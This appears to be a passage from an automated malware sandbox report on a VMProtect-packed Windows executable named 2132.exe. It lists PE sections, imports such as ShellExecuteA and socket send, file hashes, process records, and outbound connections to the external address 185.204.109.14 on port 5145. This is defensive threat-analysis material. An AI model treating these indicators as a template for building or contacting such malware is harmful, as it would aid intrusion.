          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x8082a00x5f88.vmp1
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x80f0000x134.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x440dd00x28.vmp1
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8081600x140.vmp1
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x46f0000x260.vmp1
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x4afcf0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x4c0000xf14c0xf2009f3f8d3284d7dd4853a00c0fcd0557adFalse0.6731178977272727data6.80611112393545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x5c0000x10b80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .pdata0x5e0000x315c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .vmp00x620000x3cc60e0x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .vmp10x42f0000x3df2280x3df4006acd7a8991ed41ec0b72690df6aec7abunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .reloc0x80f0000x1340x200ba4a2a1210ffd02b22cef531046367e1False0.5078125data3.5768741610740182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x8100000x1d50x2005bfe3ab15db93f584d2b58582a2c5b2eFalse0.5234375data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_MANIFEST0x8100580x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
          DLLImport
          KERNEL32.dllGetCurrentProcess
          USER32.dllGetWindowThreadProcessId
          GDI32.dllGetObjectA
          ADVAPI32.dllGetTokenInformation
          SHELL32.dllShellExecuteA
          MSVCP140.dll??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z
          IMM32.dllImmReleaseContext
          dwmapi.dllDwmExtendFrameIntoClientArea
          d3d9.dllDirect3DCreate9Ex
          WS2_32.dllsend
          WINMM.dllPlaySoundA
          VCRUNTIME140_1.dll__CxxFrameHandler4
          VCRUNTIME140.dllmemmove
          api-ms-win-crt-runtime-l1-1-0.dll_initialize_narrow_environment
          api-ms-win-crt-stdio-l1-1-0.dllfgetc
          api-ms-win-crt-string-l1-1-0.dllstrncpy
          api-ms-win-crt-utility-l1-1-0.dllqsort
          api-ms-win-crt-heap-l1-1-0.dll_callnewh
          api-ms-win-crt-convert-l1-1-0.dllatof
          api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file
          api-ms-win-crt-time-l1-1-0.dll_time64
          api-ms-win-crt-math-l1-1-0.dllceilf
          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
          WTSAPI32.dllWTSSendMessageW
          KERNEL32.dllGetCurrentProcess
          USER32.dllCharUpperBuffW
          ADVAPI32.dllRegQueryValueExA
          KERNEL32.dllLocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
          ADVAPI32.dllOpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSource PortDest PortSource IPDest IP
          Mar 23, 2024 18:48:51.396579981 CET497055145192.168.2.5185.204.109.14
          Mar 23, 2024 18:48:51.562235117 CET514549705185.204.109.14192.168.2.5
          Mar 23, 2024 18:48:51.562325001 CET497055145192.168.2.5185.204.109.14
          Mar 23, 2024 18:48:51.565020084 CET497055145192.168.2.5185.204.109.14
          Mar 23, 2024 18:48:51.730622053 CET514549705185.204.109.14192.168.2.5
          Mar 23, 2024 18:48:51.805844069 CET497055145192.168.2.5185.204.109.14

          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:18:48:47
          Start date:23/03/2024
          Path:C:\Users\user\Desktop\2132.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\2132.exe"
          Imagebase:0x7ff7fa6d0000
          File size:4'124'160 bytes
          MD5 hash:4C011BCE3CC2A63E49788E00273DA5EA
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:18:48:47
          Start date:23/03/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          No disassembly